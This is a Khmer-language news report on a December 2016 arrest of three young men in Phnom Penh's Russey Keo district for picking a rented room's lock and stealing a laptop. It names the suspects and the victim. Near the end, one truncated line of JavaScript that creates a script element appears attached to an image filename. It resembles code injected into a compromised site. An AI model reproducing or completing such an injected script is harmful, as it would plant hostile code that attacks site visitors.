Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ឆ្កឹះបន្ទប់លួចទ្រព្យសម្បត្តិគេ ត្រូវកម្លាំងល្បាតខណ្ឌឬស្សីកែវចាប់បាន៣នាក់

ភ្នំពេញ៖ ជនសង្ស័យចំនួន៣នាក់  ត្រូវបានកម្លាំងល្បាត សហប៉ុស្តិ៏ខណ្ឌឬស្សីកែវ ដឹកនាំដោយលោកណយ ច័ន្ទណារ័ត្ន ព្រហ្មទណ្ឌខណ្ឌសហការជាមួយសមត្ថកិច្ចប៉ុស្តិ៍ទួលសង្កែ និងប៉ុស្តិ៏ឬស្សីកែវ មានទាំងប្រជាការពារ ផងនោះ បានធ្វើការឃាត់ខ្លួនពួកគេកាលពីវេលាម៉ោង ៣ ភ្លឺថ្ងៃទី៤ ខែធ្នូ ឆ្នាំ២០១៦ស្ថិតនៅផ្លូវបេតុង ក្រុមទី៦ ភូមិ ទួលសង្កែ សង្កាត់ទួសង្កែ ខណ្ឌឬស្សីកែវ។

 

 

ព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវ លោកណយ ច័ន្ទណារ័ត្ន បានអោយដឹងថាជនសង្ស័យទី១ឈ្មោះនៅ ពៅ ហៅ(ពាវ) ភេទប្រុស អាយុ១៨ឆ្នាំ ទី២ឈ្មោះហៀង វឌ្ឍនា ហៅ(ឌី) ភេទប្រុស អាយុ១៨ឆ្នាំ និងទី៣ឈ្មោះប្រាក់ ភារម្ស ហៅ( ចក់) ភេទប្រុស អាយុ២០ឆ្នាំ ទាំង៣នាក់មានមុខរបរមិនពិតប្រាកដ និងស្នាក់នៅបន្ទប់ជួល ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ។ ចំនែកជនរងគ្រោះឈ្មោះលន់ ណារិន ភេទប្រុស អាយុ២៣ឆ្នាំ ទីលំនៅកន្លែងហេតុខាងលើ ជានិស្សិតសាកលវិទ្យល័យជាតិគ្រប់គ្រង។

 

លោកបន្តថាក្នុងការឃាត់ខ្លួនជនសង្ស័យសមត្ថកិច្ច Laptopចំនួន១គ្រឿង ម៉ាកអេស៊ូស ពណ៌ខ្មៅ លាយស ឆ្នាំងសាក Laptop ចំនួន១ម៉ាសីុនដាក់សីុមម៉ូឌីមវ៉ាយ
ហ្វាយ ចំនួន១ពណ៌ខ្មៅ និងដែកសសៃតូចចំនួន៤សសៃ ពណ៌ស ប្រវែង១០ស.មសំរាប់ធ្វើសកម្មភាពឆ្កឹះមេសោរ។

 

មន្ត្រីព្រហ្មទណ្ឌរូបនេះបានអោយដឹងទៀតថា  នៅវេលាម៉ោង១រំលងអាធ្រាតជនសង្ស័យចំនួន៤នាក់បានធ្វើ
សកម្មភាពឆ្កឹះសោរបន្ទប់ជួល ចំណុចខាងលើនៅ ពេលម្ចាស់បន្ទប់មិននៅ ពេលធ្វើសកម្មភាពបានសំរេច ជនសង្ស័យយកសំភារៈ និងវត្ថុតាខាងលើដើរចេញមកផ្លូវរង់ចាំម៉ូតូឌុប ភ្លាមនោះសមត្តកិច្ចយើងមានការសង្ស័យ និងត្រួតពិនិត្យឃើញមានសំភារៈ និងវត្ថុតាងខាងលើក៏ឃាត់ខ្លួនមកទីស្នាក់ការប៉ុសិ៍្តតែម្ដង។ក្រោយការឃាត់ខ្លួនសម្ភារៈត្រូវបានសមត្ថកិច្ចប្រគល់ជូនជនរងគ្រោះវិញ។

 

បច្ចុប្បន្នជនសង្ស័យទាំង៣នាក់ រួមនឹងវត្ថុតាង ត្រូវសមត្ថកិច្ចបញ្ជូនមកអធិការដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដើម្បីចាត់ការតាមផ្លូវច្បាប់៕

img-20161204-wa0062 img-20161204-wa0061 img-20161204-wa0060 img-20161204-wa0059

img-20161204-wa0063var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More